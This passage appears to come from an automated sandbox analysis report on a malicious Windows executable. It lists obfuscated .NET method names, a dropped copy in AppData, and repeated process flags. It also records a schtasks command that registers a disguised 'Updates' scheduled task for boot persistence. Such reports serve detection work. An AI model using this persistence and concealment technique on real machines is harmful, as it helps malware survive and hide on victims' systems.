                Source: 0.2.PvAmrCZENy.exe.3120000.0.raw.unpack, oCTbc7rrOLM3ykXKQk9.csHigh entropy of concatenated method names: 'nhKj82JbQ3', 'Bh3jzH6qUa', 'LEcLySmmlH', 'XDRLrin47M', 'nuALeZya4u', 'aMYLNuM0w4', 'KWrLqRwyt8', 'sYqLU9sgWK', 'CEMLZ3UUCI', 'wbELxssCkb'
                Source: 0.2.PvAmrCZENy.exe.3120000.0.raw.unpack, strlKMIZoyKBubENRm.csHigh entropy of concatenated method names: 'me6HfY8w0q', 'BVsHkR5PDN', 'N9uHIjf3re', 'UyfHS4dEos', 'ufVHc9pegC', 'woIH6nlYe1', 'kO5H4FRx7V', 'a7mH2tA4Th', 'W9lHKxUhii', 'tNeHP0PnLX'
                Source: 0.2.PvAmrCZENy.exe.3120000.0.raw.unpack, GSP44nB6VM63cs9A1M.csHigh entropy of concatenated method names: 'QHa1UQJaCO', 'Pvq1xx3Q9J', 'DSZ1JET7Hv', 'RVo1AZl3jx', 'fIe1hfs4kJ', 'EcyJmuG02C', 'znnJ9u0bli', 'HDLJD9Z9NS', 'y63JTN8yBF', 'uNUJYyGwgY'
                Source: 0.2.PvAmrCZENy.exe.3120000.0.raw.unpack, kpXV5BvNYnN2J32gRE.csHigh entropy of concatenated method names: 'JVsJXhJ6iN', 'sjXJige1oP', 'VEy36BAyCC', 'jhY34i4E2W', 'QCa32Bdysb', 'irZ3Kj2HWs', 'O063PXPYcw', 'iED35xigtc', 'CAw3QHe4eV', 'u6Q3fCp0Po'
                Source: 0.2.PvAmrCZENy.exe.4d0c9e0.4.raw.unpack, mS6gZkYdVOZrKGG8hX.csHigh entropy of concatenated method names: 'J7AaBq5AmW', 'Q23acaNdj4', 'rYRa64TZ1g', 'vOLa41x1MQ', 'f51a252qY4', 'rrpaKApV4F', 'JwraPJx0dK', 'uLSa55YIvQ', 'O1ZaQh8Spu', 'crpaf19yCs'
                Source: 0.2.PvAmrCZENy.exe.4d0c9e0.4.raw.unpack, u07XDpgHpxVYHUppXV.csHigh entropy of concatenated method names: 'kHc3lQmyVa', 'dB63nZmol5', 'z413VFn9Dt', 'Xx33gD07FC', 'i203HsBgeA', 'TJ43bOSgTH', 'UaY3RkSaZR', 'ePx3tyKF3h', 'Jsf3ay0Ydt', 'E0N3jsBiZw'
                Source: 0.2.PvAmrCZENy.exe.4d0c9e0.4.raw.unpack, JpsTIeV6A7NfgyrDkl.csHigh entropy of concatenated method names: 'yi0xIMAFtt', 'uXhxSVs1Wf', 'd5HxWcy9VZ', 'na4xd6726b', 'yjmxmZ9Idw', 't0Tx9iWqVK', 'XCExDFEmj2', 'DToxTnSAZq', 'HVExY6aFDK', 'np3x88dtgq'
                Source: 0.2.PvAmrCZENy.exe.4d0c9e0.4.raw.unpack, F6ARVpzaNnUQdyao3j.csHigh entropy of concatenated method names: 'YBTjntpLlo', 'V7wjVmXXrR', 'HiLjg7UDxI', 'rH3jBgFOhe', 'H3fjcYhEsK', 'YGTj4APm3d', 'MCxj2W3V9Z', 'khJjo0esdV', 'CK4jEgFsP1', 's2xjGvBeqv'
                Source: 0.2.PvAmrCZENy.exe.4d0c9e0.4.raw.unpack, z8AZ6ghdOTIOtxwqZj.csHigh entropy of concatenated method names: 'hDJNUEHoo9', 'mXZNZWmFmn', 'PZhNx6iguh', 'lHiN3FYVm9', 'CQlNJKnFK9', 'Ga6N1xn8FL', 'BpSNAgnXth', 'RMxNhATRlq', 'xAlNwIukUO', 'gLONFSnbeD'
                Source: 0.2.PvAmrCZENy.exe.4d0c9e0.4.raw.unpack, kPeThipR6kgr26coax.csHigh entropy of concatenated method names: 'abxCViXfl6', 'OU9CgfWPqo', 'XInCB2dqKc', 'vmSCcKhNYa', 'T3NC4CFstu', 'irpC2DmQDS', 'J8eCPDvBaD', 'GPyC5W63TT', 'XZBCf6mEgD', 'VlqCugba9s'
                Source: 0.2.PvAmrCZENy.exe.4d0c9e0.4.raw.unpack, dpeYSjP1UMv2qXuK2B.csHigh entropy of concatenated method names: 'dsDAZ6kYw4', 'B6tA3v8m86', 'TXrA1IqkEQ', 'cQ218PnGSy', 'VgP1zIWbxK', 'MYbAyAOmFK', 'hZpArtyArd', 'mqMAeiPlLs', 'CUgANnPmdT', 'cirAqpJbbu'
                Source: 0.2.PvAmrCZENy.exe.4d0c9e0.4.raw.unpack, q5clipqBHqOnkVSmJl.csHigh entropy of concatenated method names: 'Lg2rApsTIe', 'HA7rhNfgyr', 'QHprFxVYHU', 'QpXr0VhpXV', 'h2grHREBSP', 'I4nrb6VM63', 'EhwZ7jm1RaItdGKwV4', 'OhGUIvPrI70fhZoKhO', 'K0VrrEMBZ4', 'DrWrNWXgI6'
                Source: 0.2.PvAmrCZENy.exe.4d0c9e0.4.raw.unpack, oXOgna9aQgAHxFpovw.csHigh entropy of concatenated method names: 'sCIRTU8oPy', 'vTCR8FNjAc', 'bVCtyDEGQq', 'IkRtrisgky', 'lppRuqNxqC', 'RUDRkK2cYo', 'VHSRprZkeV', 'UbsRIOm0Pn', 'zbERSwwe05', 'BvpRWCtFIZ'
                Source: 0.2.PvAmrCZENy.exe.4d0c9e0.4.raw.unpack, gUKDmLQMndPSRA3HBN.csHigh entropy of concatenated method names: 'E5GAEuKKof', 'DaTAG3Tqir', 'KETAM1BfAg', 'bVPAl0wNIn', 'RTDAXt4YeQ', 'CvKAnk2oCD', 'Cj5AimgKG0', 'MkrAVDUoFZ', 'MMiAgsyum4', 'LdKAvKgkF7'
                Source: 0.2.PvAmrCZENy.exe.4d0c9e0.4.raw.unpack, fNvmGLe0G2dhMMIpXW.csHigh entropy of concatenated method names: 'G9rMlBW2E', 'iGlltvWyi', 'sIGnFNdJQ', 'yIai4Ips9', 'Uh8gDDXqg', 'lLQvr9jDn', 'mVdqPLMcyw7HRWxGdv', 'kHVPf0RLuquZ21kiVD', 'SltoTaD97evxTboRMv', 'sGmttreK4'
                Source: 0.2.PvAmrCZENy.exe.4d0c9e0.4.raw.unpack, IabwK0xQXmYgZNDWfQ.csHigh entropy of concatenated method names: 'Dispose', 'ucarY9FiTe', 'DCoecf9Hyk', 'zcJESGHMNm', 'rD2r849Pkk', 'OtZrz6LtDO', 'ProcessDialogKey', 'UFFeyS6gZk', 'TVOerZrKGG', 'YhXeek1YV7'
                Source: 0.2.PvAmrCZENy.exe.4d0c9e0.4.raw.unpack, PTqIT3WJvtWp0iNXPt.csHigh entropy of concatenated method names: 'ToString', 'M33buN4nyo', 'ocmbcP1QRr', 'tlxb6NoSfq', 'UJUb4vITuF', 'tjXb26XYyg', 'KGLbKKSKaM', 'ocrbP3TKqf', 'QBhb5WkERo', 'FisbQqS9X6'
                Source: 0.2.PvAmrCZENy.exe.4d0c9e0.4.raw.unpack, x3lxZTDkOsca9FiTet.csHigh entropy of concatenated method names: 'e8caHRvfjc', 'h3haRka78F', 'zJJaaUHoCw', 'mr3aLP4XWp', 'Ua4aslXHH7', 'rYVaovyLYN', 'Dispose', 'bEYtZ57hlF', 'Rahtx8FWg1', 'MCyt3VJxaO'
                Source: 0.2.PvAmrCZENy.exe.4d0c9e0.4.raw.unpack, P1YV7U870rVYc4tCci.csHigh entropy of concatenated method names: 'zFij3dUluH', 'GmVjJRTjSu', 'W74j1J5qIN', 'VjUjA3LMsj', 't1Fja10DH9', 'xXTjh425mc', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.PvAmrCZENy.exe.4d0c9e0.4.raw.unpack, oCTbc7rrOLM3ykXKQk9.csHigh entropy of concatenated method names: 'nhKj82JbQ3', 'Bh3jzH6qUa', 'LEcLySmmlH', 'XDRLrin47M', 'nuALeZya4u', 'aMYLNuM0w4', 'KWrLqRwyt8', 'sYqLU9sgWK', 'CEMLZ3UUCI', 'wbELxssCkb'
                Source: 0.2.PvAmrCZENy.exe.4d0c9e0.4.raw.unpack, strlKMIZoyKBubENRm.csHigh entropy of concatenated method names: 'me6HfY8w0q', 'BVsHkR5PDN', 'N9uHIjf3re', 'UyfHS4dEos', 'ufVHc9pegC', 'woIH6nlYe1', 'kO5H4FRx7V', 'a7mH2tA4Th', 'W9lHKxUhii', 'tNeHP0PnLX'
                Source: 0.2.PvAmrCZENy.exe.4d0c9e0.4.raw.unpack, GSP44nB6VM63cs9A1M.csHigh entropy of concatenated method names: 'QHa1UQJaCO', 'Pvq1xx3Q9J', 'DSZ1JET7Hv', 'RVo1AZl3jx', 'fIe1hfs4kJ', 'EcyJmuG02C', 'znnJ9u0bli', 'HDLJD9Z9NS', 'y63JTN8yBF', 'uNUJYyGwgY'
                Source: 0.2.PvAmrCZENy.exe.4d0c9e0.4.raw.unpack, kpXV5BvNYnN2J32gRE.csHigh entropy of concatenated method names: 'JVsJXhJ6iN', 'sjXJige1oP', 'VEy36BAyCC', 'jhY34i4E2W', 'QCa32Bdysb', 'irZ3Kj2HWs', 'O063PXPYcw', 'iED35xigtc', 'CAw3QHe4eV', 'u6Q3fCp0Po'
                Source: 0.2.PvAmrCZENy.exe.4c855c0.1.raw.unpack, mS6gZkYdVOZrKGG8hX.csHigh entropy of concatenated method names: 'J7AaBq5AmW', 'Q23acaNdj4', 'rYRa64TZ1g', 'vOLa41x1MQ', 'f51a252qY4', 'rrpaKApV4F', 'JwraPJx0dK', 'uLSa55YIvQ', 'O1ZaQh8Spu', 'crpaf19yCs'
                Source: 0.2.PvAmrCZENy.exe.4c855c0.1.raw.unpack, u07XDpgHpxVYHUppXV.csHigh entropy of concatenated method names: 'kHc3lQmyVa', 'dB63nZmol5', 'z413VFn9Dt', 'Xx33gD07FC', 'i203HsBgeA', 'TJ43bOSgTH', 'UaY3RkSaZR', 'ePx3tyKF3h', 'Jsf3ay0Ydt', 'E0N3jsBiZw'
                Source: 0.2.PvAmrCZENy.exe.4c855c0.1.raw.unpack, JpsTIeV6A7NfgyrDkl.csHigh entropy of concatenated method names: 'yi0xIMAFtt', 'uXhxSVs1Wf', 'd5HxWcy9VZ', 'na4xd6726b', 'yjmxmZ9Idw', 't0Tx9iWqVK', 'XCExDFEmj2', 'DToxTnSAZq', 'HVExY6aFDK', 'np3x88dtgq'
                Source: 0.2.PvAmrCZENy.exe.4c855c0.1.raw.unpack, F6ARVpzaNnUQdyao3j.csHigh entropy of concatenated method names: 'YBTjntpLlo', 'V7wjVmXXrR', 'HiLjg7UDxI', 'rH3jBgFOhe', 'H3fjcYhEsK', 'YGTj4APm3d', 'MCxj2W3V9Z', 'khJjo0esdV', 'CK4jEgFsP1', 's2xjGvBeqv'
                Source: 0.2.PvAmrCZENy.exe.4c855c0.1.raw.unpack, z8AZ6ghdOTIOtxwqZj.csHigh entropy of concatenated method names: 'hDJNUEHoo9', 'mXZNZWmFmn', 'PZhNx6iguh', 'lHiN3FYVm9', 'CQlNJKnFK9', 'Ga6N1xn8FL', 'BpSNAgnXth', 'RMxNhATRlq', 'xAlNwIukUO', 'gLONFSnbeD'
                Source: 0.2.PvAmrCZENy.exe.4c855c0.1.raw.unpack, kPeThipR6kgr26coax.csHigh entropy of concatenated method names: 'abxCViXfl6', 'OU9CgfWPqo', 'XInCB2dqKc', 'vmSCcKhNYa', 'T3NC4CFstu', 'irpC2DmQDS', 'J8eCPDvBaD', 'GPyC5W63TT', 'XZBCf6mEgD', 'VlqCugba9s'
                Source: 0.2.PvAmrCZENy.exe.4c855c0.1.raw.unpack, dpeYSjP1UMv2qXuK2B.csHigh entropy of concatenated method names: 'dsDAZ6kYw4', 'B6tA3v8m86', 'TXrA1IqkEQ', 'cQ218PnGSy', 'VgP1zIWbxK', 'MYbAyAOmFK', 'hZpArtyArd', 'mqMAeiPlLs', 'CUgANnPmdT', 'cirAqpJbbu'
                Source: 0.2.PvAmrCZENy.exe.4c855c0.1.raw.unpack, q5clipqBHqOnkVSmJl.csHigh entropy of concatenated method names: 'Lg2rApsTIe', 'HA7rhNfgyr', 'QHprFxVYHU', 'QpXr0VhpXV', 'h2grHREBSP', 'I4nrb6VM63', 'EhwZ7jm1RaItdGKwV4', 'OhGUIvPrI70fhZoKhO', 'K0VrrEMBZ4', 'DrWrNWXgI6'
                Source: 0.2.PvAmrCZENy.exe.4c855c0.1.raw.unpack, oXOgna9aQgAHxFpovw.csHigh entropy of concatenated method names: 'sCIRTU8oPy', 'vTCR8FNjAc', 'bVCtyDEGQq', 'IkRtrisgky', 'lppRuqNxqC', 'RUDRkK2cYo', 'VHSRprZkeV', 'UbsRIOm0Pn', 'zbERSwwe05', 'BvpRWCtFIZ'
                Source: 0.2.PvAmrCZENy.exe.4c855c0.1.raw.unpack, gUKDmLQMndPSRA3HBN.csHigh entropy of concatenated method names: 'E5GAEuKKof', 'DaTAG3Tqir', 'KETAM1BfAg', 'bVPAl0wNIn', 'RTDAXt4YeQ', 'CvKAnk2oCD', 'Cj5AimgKG0', 'MkrAVDUoFZ', 'MMiAgsyum4', 'LdKAvKgkF7'
                Source: 0.2.PvAmrCZENy.exe.4c855c0.1.raw.unpack, fNvmGLe0G2dhMMIpXW.csHigh entropy of concatenated method names: 'G9rMlBW2E', 'iGlltvWyi', 'sIGnFNdJQ', 'yIai4Ips9', 'Uh8gDDXqg', 'lLQvr9jDn', 'mVdqPLMcyw7HRWxGdv', 'kHVPf0RLuquZ21kiVD', 'SltoTaD97evxTboRMv', 'sGmttreK4'
                Source: 0.2.PvAmrCZENy.exe.4c855c0.1.raw.unpack, IabwK0xQXmYgZNDWfQ.csHigh entropy of concatenated method names: 'Dispose', 'ucarY9FiTe', 'DCoecf9Hyk', 'zcJESGHMNm', 'rD2r849Pkk', 'OtZrz6LtDO', 'ProcessDialogKey', 'UFFeyS6gZk', 'TVOerZrKGG', 'YhXeek1YV7'
                Source: 0.2.PvAmrCZENy.exe.4c855c0.1.raw.unpack, PTqIT3WJvtWp0iNXPt.csHigh entropy of concatenated method names: 'ToString', 'M33buN4nyo', 'ocmbcP1QRr', 'tlxb6NoSfq', 'UJUb4vITuF', 'tjXb26XYyg', 'KGLbKKSKaM', 'ocrbP3TKqf', 'QBhb5WkERo', 'FisbQqS9X6'
                Source: 0.2.PvAmrCZENy.exe.4c855c0.1.raw.unpack, x3lxZTDkOsca9FiTet.csHigh entropy of concatenated method names: 'e8caHRvfjc', 'h3haRka78F', 'zJJaaUHoCw', 'mr3aLP4XWp', 'Ua4aslXHH7', 'rYVaovyLYN', 'Dispose', 'bEYtZ57hlF', 'Rahtx8FWg1', 'MCyt3VJxaO'
                Source: 0.2.PvAmrCZENy.exe.4c855c0.1.raw.unpack, P1YV7U870rVYc4tCci.csHigh entropy of concatenated method names: 'zFij3dUluH', 'GmVjJRTjSu', 'W74j1J5qIN', 'VjUjA3LMsj', 't1Fja10DH9', 'xXTjh425mc', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.PvAmrCZENy.exe.4c855c0.1.raw.unpack, oCTbc7rrOLM3ykXKQk9.csHigh entropy of concatenated method names: 'nhKj82JbQ3', 'Bh3jzH6qUa', 'LEcLySmmlH', 'XDRLrin47M', 'nuALeZya4u', 'aMYLNuM0w4', 'KWrLqRwyt8', 'sYqLU9sgWK', 'CEMLZ3UUCI', 'wbELxssCkb'
                Source: 0.2.PvAmrCZENy.exe.4c855c0.1.raw.unpack, strlKMIZoyKBubENRm.csHigh entropy of concatenated method names: 'me6HfY8w0q', 'BVsHkR5PDN', 'N9uHIjf3re', 'UyfHS4dEos', 'ufVHc9pegC', 'woIH6nlYe1', 'kO5H4FRx7V', 'a7mH2tA4Th', 'W9lHKxUhii', 'tNeHP0PnLX'
                Source: 0.2.PvAmrCZENy.exe.4c855c0.1.raw.unpack, GSP44nB6VM63cs9A1M.csHigh entropy of concatenated method names: 'QHa1UQJaCO', 'Pvq1xx3Q9J', 'DSZ1JET7Hv', 'RVo1AZl3jx', 'fIe1hfs4kJ', 'EcyJmuG02C', 'znnJ9u0bli', 'HDLJD9Z9NS', 'y63JTN8yBF', 'uNUJYyGwgY'
                Source: 0.2.PvAmrCZENy.exe.4c855c0.1.raw.unpack, kpXV5BvNYnN2J32gRE.csHigh entropy of concatenated method names: 'JVsJXhJ6iN', 'sjXJige1oP', 'VEy36BAyCC', 'jhY34i4E2W', 'QCa32Bdysb', 'irZ3Kj2HWs', 'O063PXPYcw', 'iED35xigtc', 'CAw3QHe4eV', 'u6Q3fCp0Po'
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeFile created: C:\Users\user\AppData\Roaming\yxXYABHh.exeJump to dropped file

                Boot Survival

                barindex
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yxXYABHh" /XML "C:\Users\user\AppData\Local\Temp\tmp4DA1.tmp"

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
